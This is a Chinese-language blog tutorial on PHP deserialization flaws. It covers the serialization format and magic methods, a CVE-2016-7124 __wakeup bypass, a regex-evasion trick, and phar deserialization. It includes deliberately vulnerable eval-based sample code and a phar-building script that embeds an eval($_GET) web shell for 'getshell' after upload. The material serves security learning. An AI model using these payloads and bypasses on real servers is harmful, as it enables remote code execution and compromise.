<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="PHP反序列化"><meta name="keywords" content="php,反序列化"><meta name="author" content="Dar1in9"><meta name="copyright" content="Dar1in9"><title>PHP反序列化 | Dar1in9's Blog</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.7.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.7.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.css"><script src="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.js" defer></script><link rel="dns-prefetch" href="http://ta.qq.com"><script>(function() {
   var hm = document.createElement("script");
   hm.src = "https://tajs.qq.com/stats?sId=&lt;script type=&quot;text/javascript&quot; src=&quot;http://tajs.qq.com/stats?sId=66549793&quot; charset=&quot;UTF-8&quot;&gt;&lt;/script&gt;";
   var s = document.getElementsByTagName("script")[0];
   s.parentNode.insertBefore(hm, s);
 })();</script><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: {"appId":"MY1GAADR9W","apiKey":"5032629da4e94f659d98a4052bc1c5cd","indexName":"blog","hits":{"per_page":10},"languages":{"input_placeholder":"搜索文章","hits_empty":"找不到您查询的内容:${query}","hits_stats":"找到 ${hits} 条结果，用时 ${time} 毫秒"}},
  localSearch: {"path":"search.xml","languages":{"hits_empty":"找不到您查询的内容:${query}"}},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  }
} </script><meta name="generator" content="Hexo 4.2.0"></head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#序列化和反序列化"><span class="toc-number">1.</span> <span class="toc-text">序列化和反序列化</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#serialize和unserialize"><span class="toc-number">1.1.</span> <span class="toc-text">serialize和unserialize</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#php序列化格式"><span class="toc-number">1.2.</span> <span class="toc-text">php序列化格式</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#对于类对象的序列化"><span class="toc-number">1.3.</span> <span class="toc-text">对于类对象的序列化</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#魔术方法"><span class="toc-number">1.4.</span> <span class="toc-text">魔术方法</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#php反序列化漏洞"><span class="toc-number">2.</span> <span class="toc-text">php反序列化漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#魔法函数可能造成的威胁"><span class="toc-number">2.1.</span> <span class="toc-text">魔法函数可能造成的威胁</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#wakeup-方法的绕过"><span class="toc-number">2.2.</span> <span class="toc-text">__wakeup()方法的绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#php反序列化字符串的一个特性"><span class="toc-number">2.3.</span> <span class="toc-text">php反序列化字符串的一个特性</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#phar反序列化"><span class="toc-number">3.</span> <span class="toc-text">phar反序列化</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#关于phar"><span class="toc-number">3.1.</span> <span class="toc-text">关于phar</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#利用"><span class="toc-number">3.2.</span> <span class="toc-text">利用</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#session反序列化"><span class="toc-number">4.</span> <span class="toc-text">session反序列化</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/01.png"></div><div class="author-info__name text-center">Dar1in9</div><div class="author-info__description text-center">幸福不是故事，不幸才是</div><div class="follow-button"><a href="https://github.com/Dar1in9s" target="_blank" rel="noopener">Follow Me</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">46</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">20</span></a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://blog-1300147235.cos.ap-chengdu.myqcloud.com/18085.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Dar1in9's Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">Home</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="/about">About</a></span><span class="pull-right"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> 搜索</span></a></span></div><div id="post-info"><div id="post-title">PHP反序列化</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2020-01-27</time><div class="post-meta-wordcount"><span>字数总计: </span><span class="word-count">2.1k</span><span class="post-meta__separator">|</span><span>阅读时长: 7 分钟</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><p>php通过序列化和反序列化来存储和传递一些数据。</p>
<a id="more"></a>
<h2 id="序列化和反序列化"><a href="#序列化和反序列化" class="headerlink" title="序列化和反序列化"></a>序列化和反序列化</h2><h3 id="serialize和unserialize"><a href="#serialize和unserialize" class="headerlink" title="serialize和unserialize"></a>serialize和unserialize</h3><p>serialize() 将一个对象转换成字符串，保存对象的值方便之后的传递与使用。<br>unserialize()将序列化了的字符串还原为一个对象。</p>
<h3 id="php序列化格式"><a href="#php序列化格式" class="headerlink" title="php序列化格式"></a>php序列化格式</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">people</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line"> <span class="keyword">public</span> $name = <span class="string">"test"</span>;</span><br><span class="line"> <span class="keyword">public</span> $age = <span class="string">'18'</span>;</span><br><span class="line">&#125;</span><br><span class="line">$class = <span class="keyword">new</span> people();</span><br><span class="line">$class_ser = serialize($class);</span><br><span class="line">print_r($class_ser);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>结果：<code>O:6:&quot;people&quot;:2:{s:4:&quot;name&quot;;s:4:&quot;test&quot;;s:3:&quot;age&quot;;s:2:&quot;18&quot;;}</code><br><img align="left" src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/20200127140939.png"><br>除了代表对象的O，还有：</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">a - array 数组 </span><br><span class="line">b - boolean布尔型 </span><br><span class="line">d - double双精度型 </span><br><span class="line">i - integer </span><br><span class="line">o - common object一般对象 </span><br><span class="line">r - reference </span><br><span class="line">s - string </span><br><span class="line">C - custom object 自定义对象 </span><br><span class="line">O - class </span><br><span class="line">N - null </span><br><span class="line">R - pointer reference </span><br><span class="line">U - unicode string unicode编码的字符串</span><br></pre></td></tr></table></figure>

<h3 id="对于类对象的序列化"><a href="#对于类对象的序列化" class="headerlink" title="对于类对象的序列化"></a>对于类对象的序列化</h3><ul>
<li><strong>var和public</strong>声明的字段都是公共字段，因此它们的字段名的序列化格式是相同的。公共字段的字段名按照声明时的字段名进行序列化。</li>
<li><strong>protected</strong>声明的字段为保护字段，在所声明的类和该类的子类中可见，但在该类的对象实例中不可见，因此保护字段的字段名在序列化时，字段名前面会加上<code>\0*\0</code>的前缀。（这里的<code>\0</code>表示ascii码为0的字符）</li>
<li><strong>private</strong>声明的字段为私有字段，只在所声明的类中可见，在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时，字段前面会加上<code>\0&lt;declared class name&gt;\0</code>的前缀。（这里的<declared class name>表示的是声明该私有字段的类的类名，而不是被序列化的对象的类名。</li>
<li>字段名被作为字符串序列化时，字符串值中包括根据其可见性所加的前缀。字符串长度也包括所加前缀的长度。<strong>其中 \0 字符也是计算长度的</strong>。</li>
</ul>
<p>一个例子：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">people</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line"> <span class="keyword">public</span> $name = <span class="string">"test"</span>;</span><br><span class="line"> <span class="keyword">private</span> $age = <span class="string">'18'</span>;</span><br><span class="line"> <span class="keyword">protected</span> $home=<span class="string">"sichuan"</span>;</span><br><span class="line">&#125;</span><br><span class="line">$class = <span class="keyword">new</span> people();</span><br><span class="line">$class_ser = serialize($class);</span><br><span class="line"><span class="keyword">echo</span> $class_ser;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>结果：<code>O:6:&quot;people&quot;:3:{s:4:&quot;name&quot;;s:4:&quot;test&quot;;s:11:&quot;&lt;0x00&gt;people&lt;0x00&gt;age&quot;;s:2:&quot;18&quot;;s:7:&quot;&lt;0x00&gt;*&lt;0x00&gt;home&quot;;s:7:&quot;sichuan&quot;;}</code></p>
<h3 id="魔术方法"><a href="#魔术方法" class="headerlink" title="魔术方法"></a>魔术方法</h3><table>
<thead>
<tr>
<th>魔术方法</th>
<th>触发条件</th>
</tr>
</thead>
<tbody><tr>
<td>__construct()</td>
<td>构造函数，创建对象时触发</td>
</tr>
<tr>
<td>__destruct()</td>
<td>析构函数，对象被销毁时触发</td>
</tr>
<tr>
<td>__call()</td>
<td>在对象上下文中调用不可访问或不存在的方法时触发</td>
</tr>
<tr>
<td>__callStatic()</td>
<td>在静态上下文中调用不可访问的方法时触发</td>
</tr>
<tr>
<td>__get()</td>
<td>用于从不可访问或不存在的属性读取数据</td>
</tr>
<tr>
<td>__set()</td>
<td>用于将数据写入不可访问或不存在的属性</td>
</tr>
<tr>
<td>__isset()</td>
<td>在不可访问的属性上调用isset()或empty()触发</td>
</tr>
<tr>
<td>__unset()</td>
<td>在不可访问的属性上使用unset()时触发</td>
</tr>
<tr>
<td>__sleep()</td>
<td>使用serialize()函数时触发</td>
</tr>
<tr>
<td>__weakup()</td>
<td>被unserialize()反序列化时触发</td>
</tr>
<tr>
<td>__toString()</td>
<td>一个类被当做字符串时触发。用于一个类被当成字符串时应怎样回应。例如 <code>echo $obj;</code>应该显示些什么。此方法必须返回一个字符串，否则会产生错误</td>
</tr>
<tr>
<td>__invoke()</td>
<td>当尝试以调用函数的方式调用一个对象时触发</td>
</tr>
<tr>
<td>__set_state()</td>
<td>当调用 var_export()导出类时，此静态方法会被调用</td>
</tr>
<tr>
<td>__clone()</td>
<td>对象复制可以通过<code>clone</code>关键字来完成,此时将调用对象的__clone()方法</td>
</tr>
<tr>
<td>__debuginfo()</td>
<td>转储对象以获取应显示的属性时，此方法由var_dump()调用</td>
</tr>
</tbody></table>
<h2 id="php反序列化漏洞"><a href="#php反序列化漏洞" class="headerlink" title="php反序列化漏洞"></a>php反序列化漏洞</h2><p>php使用unserialize()函数将序列化了的字符串反序列化为对象，而当传入unserialize()的参数可控时，可以通过传入特定字符串来控制对象内部的变量。<br>漏洞利用条件：<strong>unserialize()参数可控</strong></p>
<h3 id="魔法函数可能造成的威胁"><a href="#魔法函数可能造成的威胁" class="headerlink" title="魔法函数可能造成的威胁"></a>魔法函数可能造成的威胁</h3><p>PHP中反序列化导致实例化对象，除了利用PHP本身的漏洞以外，我们通常找<strong>destruct、</strong>wakeup、<strong>toString等方法，看看这些方法中是否有可利用的代码。其中</strong>destruct在对象销毁的时候被调用，<strong>wakeup在唤醒（反序列化）的时候被调用，</strong>toString在对象被转换成字符串的时候被调用。</p>
<p>优先级:<code>__wakeup&gt;__toString&gt;__destruct</code></p>
<p><strong>__toString():</strong><br>其实，当反序列化后的对象被输出在模板中的时候（转换成字符串的时候），就可以触发相应的漏洞。<br>常见__tostring触发条件：</p>
<ul>
<li><code>echo ($obj)</code> / <code>print($obj)</code> 打印时会触发</li>
<li>字符串连接时<br><code>&quot;I am {$obj}&quot;</code>或<code>&#39;test&#39;.$obj</code></li>
<li>格式化字符串时<br><code>sprintf(&#39;i am %s&#39;, $obj)</code></li>
<li>与字符串进行<code>==</code>比较时（PHP进行<code>==</code>比较的时候会转换参数类型）<br><code>if($obj == &#39;admin&#39;)</code></li>
<li>格式化SQL语句，绑定参数时</li>
<li>使用<code>in_array</code>进行比较时<br><code>in_array($obj, [&#39;admin&#39;, &#39;guest&#39;])</code> 数组中有字符串的时候会被调用</li>
<li>使用<code>switch</code>进行比较时<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">switch</span> ($obj) &#123;</span><br><span class="line">  <span class="keyword">case</span> <span class="string">'admin'</span>:</span><br><span class="line">      <span class="comment"># code...</span></span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">  <span class="keyword">default</span>:</span><br><span class="line">      <span class="comment"># code...</span></span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line"> &#125;</span><br></pre></td></tr></table></figure>



</li>
</ul>
<h3 id="wakeup-方法的绕过"><a href="#wakeup-方法的绕过" class="headerlink" title="__wakeup()方法的绕过"></a>__wakeup()方法的绕过</h3><p>CVE-2016-7124漏洞：<br><strong>wakeup 触发于<code>unserilize()</code>调用之前, **当反序列化时的字符串所对应的对象的数目大于实际数目时,</strong>wakeup()函数就不会被调用<strong>. 并且</strong>不会重建为对象<strong>, 但是</strong>会触发其他的魔术方法**比如<code>__destruct()</code></p>
<p>适用版本：</p>
<blockquote>
<p>PHP5.x系列为5.6.25之前<br>php7.x系列为7.0.10之前</p>
</blockquote>
<p>例如：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">test</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> $code=<span class="string">"echo 'nonono';"</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">$this</span>-&gt;code=<span class="string">"echo 'nonono';"</span>;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">eval</span>(<span class="keyword">$this</span>-&gt;code);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">$str=$_GET[<span class="string">'str'</span>];</span><br><span class="line">$obj=unserialize($str);</span><br></pre></td></tr></table></figure>
<p>此时，正常的序列化字符串为：<code>O:4:&quot;test&quot;:1:{s:4:&quot;code&quot;;s:18:&quot;echo phpversion();&quot;;}</code><br>可以修改对象属性数目来绕过__wakeup：<code>O:4:&quot;test&quot;:2:{s:4:&quot;code&quot;;s:18:&quot;echo phpversion();&quot;;}</code></p>
<h3 id="php反序列化字符串的一个特性"><a href="#php反序列化字符串的一个特性" class="headerlink" title="php反序列化字符串的一个特性"></a>php反序列化字符串的一个特性</h3><p>对象长度前添加一个<code>&quot;+&quot;</code>号，反序列化时不会有影响<br>例如：<br><code>O:4:&quot;test&quot;:1:{s:4:&quot;code&quot;;s:18:&quot;echo phpversion();&quot;;}</code> == <code>O:+4:&quot;test&quot;:1:{s:4:&quot;code&quot;;s:18:&quot;echo phpversion();&quot;;}</code><br>由此，可以绕过一些简单的正则匹配，比如：<code>preg_match(&#39;/O:\d:/&#39;, $data)</code></p>
<h2 id="phar反序列化"><a href="#phar反序列化" class="headerlink" title="phar反序列化"></a>phar反序列化</h2><h3 id="关于phar"><a href="#关于phar" class="headerlink" title="关于phar"></a>关于phar</h3><p>简单的说，phar就是php的压缩文件，它可以把多个文件归档到同一个文件中，而且不经过解压就能被 php 访问并执行，与file:// ，php://等类似，也是一种流包装器。<br>phar结构由4个部分组成：</p>
<ol>
<li><code>stub</code><br> phar 文件标识，格式为 xxx<?php xxx; __HALT_COMPILER();?>；</li>
<li><code>manifest</code><br> 压缩文件的属性等信息，以序列化存储；</li>
<li><code>contents</code><br> 压缩文件的内容；</li>
<li><code>signature</code><br> 签名，放在文件末尾；</li>
</ol>
<p>两个关键点：</p>
<ul>
<li>一是文件标识，必须以<code>__HALT_COMPILER();?&gt;</code>结尾，但前面的内容没有限制，也就是说我们<strong>可以轻易伪造一个图片文件或者pdf文件来绕过一些上传限制</strong>；</li>
<li>二是反序列化，phar存储的meta-data信息以<strong>序列化方式</strong>存储，<strong>当文件操作函数通过phar://伪协议解析phar文件时就会将数据反序列化</strong>，而这样的文件操作函数有很多。<img align="left" src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/20200127170446.png">


</li>
</ul>
<h3 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h3><p><strong>利用条件：</strong></p>
<ol>
<li>phar文件要能够上传到服务器端</li>
<li>要有可用的魔术方法作为“跳板”</li>
<li>要有文件操作函数，如file_exists()，fopen()，file_get_contents()，file()</li>
<li>文件操作函数的参数可控，且:、/、phar等特殊字符没有被过滤</li>
</ol>
<p><strong>测试：</strong><br>如果有文件test.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Testobj</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">	<span class="keyword">var</span> $output=<span class="string">"echo 'ok';"</span>;</span><br><span class="line">	<span class="function"><span class="keyword">function</span> <span class="title">__destruct</span><span class="params">()</span></span></span><br><span class="line"><span class="function">	</span>&#123;</span><br><span class="line">		<span class="keyword">eval</span>(<span class="keyword">$this</span>-&gt;output);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'filename'</span>]))</span><br><span class="line">&#123;</span><br><span class="line">	$filename=$_GET[<span class="string">'filename'</span>];</span><br><span class="line">	var_dump(file_exists($filename));</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>生成phar的文件phar.phar可以这样写：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Testobj</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">  <span class="keyword">var</span> $output=<span class="string">''</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">@unlink(<span class="string">'test.phar'</span>);   <span class="comment">//删除之前的test.par文件(如果有)</span></span><br><span class="line">$phar=<span class="keyword">new</span> Phar(<span class="string">'test.phar'</span>);  <span class="comment">//创建一个phar对象，文件名必须以phar为后缀</span></span><br><span class="line">$phar-&gt;startBuffering();  <span class="comment">//开始写文件</span></span><br><span class="line">$phar-&gt;setStub(<span class="string">'&lt;?php __HALT_COMPILER(); ?&gt;'</span>);  <span class="comment">//写入stub</span></span><br><span class="line">$o=<span class="keyword">new</span> Testobj();  </span><br><span class="line">$o-&gt;output=<span class="string">'eval($_GET["a"]);'</span>;  </span><br><span class="line">$phar-&gt;setMetadata($o);<span class="comment">//写入meta-data</span></span><br><span class="line">$phar-&gt;addFromString(<span class="string">"test.txt"</span>,<span class="string">"test"</span>);  <span class="comment">//添加要压缩的文件</span></span><br><span class="line">$phar-&gt;stopBuffering(); </span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>这样，当我们访问phar.phpr时，将会生成test.phar的phar文件。再将其上传到服务器上，最后以phar格式访问该文件就可getshell<br><img align="left" src="https://img-blog.csdnimg.cn/20191022160652262.png"/></p>
<h2 id="session反序列化"><a href="#session反序列化" class="headerlink" title="session反序列化"></a>session反序列化</h2><p><a href="../关于php%20session及其session反序列化/">关于php session及session反序列化</a></p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">Dar1in9</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://dar1in9s.github.io/2020/01/27/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">http://dar1in9s.github.io/2020/01/27/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="noopener">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://Dar1in9s.github.io">Dar1in9's Blog</a>！</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/php/">php</a><a class="post-meta__tags" href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">反序列化</a></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2020/01/29/php%E4%BC%AA%E9%9A%8F%E6%9C%BA%E6%95%B0%E5%92%8Cmt_rand%E7%88%86%E7%A0%B4/"><i class="fa fa-chevron-left">  </i><span>php伪随机数和mt_rand爆破</span></a></div><div class="next-post pull-right"><a href="/2020/01/27/%E5%85%B3%E4%BA%8Ephp%20session%E5%8F%8A%E5%85%B6session%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/"><span>关于php session及其session反序列化</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(https://blog-1300147235.cos.ap-chengdu.myqcloud.com/18085.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2020 By Dar1in9</div><div class="framework-info"><span>驱动 - </span><a href="http://hexo.io" target="_blank" rel="noopener"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a href="https://github.com/Molunerfinn/hexo-theme-melody" target="_blank" rel="noopener"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.7.0"></script><script src="/js/fancybox.js?version=1.7.0"></script><script src="/js/sidebar.js?version=1.7.0"></script><script src="/js/copy.js?version=1.7.0"></script><script src="/js/fireworks.js?version=1.7.0"></script><script src="/js/transition.js?version=1.7.0"></script><script src="/js/scroll.js?version=1.7.0"></script><script src="/js/head.js?version=1.7.0"></script><script src="/js/search/algolia.js"></script><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/katex@latest/dist/katex.min.css"><script src="https://cdn.jsdelivr.net/npm/katex-copytex@latest/dist/katex-copytex.min.js"></script><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/katex-copytex@latest/dist/katex-copytex.min.css"><script src="/js/katex.js"></script><script src="/js/search/local-search.js"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script><div class="search-dialog" id="algolia-search"><div class="search-dialog__title" id="algolia-search-title">Algolia</div><div id="algolia-input-panel"><div id="algolia-search-input"></div></div><hr><div id="algolia-search-results"><div id="algolia-hits"></div><div id="algolia-pagination"></div><div id="algolia-stats"></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>